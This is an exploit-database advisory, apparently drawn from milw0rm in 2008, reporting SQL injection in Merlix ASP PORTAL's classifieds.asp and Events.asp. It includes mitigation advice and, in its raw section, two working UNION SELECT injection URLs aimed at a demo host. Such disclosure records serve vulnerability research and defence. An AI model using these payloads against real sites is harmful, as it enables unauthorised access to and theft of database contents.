Vendor: ASP PORTAL
By: OffensiveTrack
CVSS: 7.5 (HIGH)
CWE: SQL Injection
Product Name: ASP PORTAL
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

Merlix ASP PORTAL SQL Injection Vulnerability

The Merlix ASP PORTAL is vulnerable to SQL Injection. The vulnerability allows an attacker to inject malicious SQL queries through the 'ItemID' and 'ID' parameters in the 'classifieds.asp' and 'Events.asp' scripts respectively. By exploiting this vulnerability, an attacker can manipulate the SQL queries and retrieve sensitive information from the database.

Mitigation:

The vendor should sanitize user input before using it in SQL queries to prevent SQL Injection attacks. Input validation and parameterized queries also help mitigate this vulnerability.

Exploit-DB raw data:

###########################################################################
#---------------------------------------------------OffensiveTrack--------------------------------------------------------#
###########################################################################

---------------------------- Tunisian Muslim ------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Merlix ASP PORTAL
#download : null
#Demo     : http://demo.merlix.com/portal/


#Exploit :
--=[SQL INJECTION]=--
http://demo.merlix.com/portal/classifieds.asp?ItemID=-0+union+select+1,2,3,4,5,6,7,8,9,10+from+Directory
http://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from+Directory



#Greetz For Synex

###########################################################################

# milw0rm.com [2008-12-05]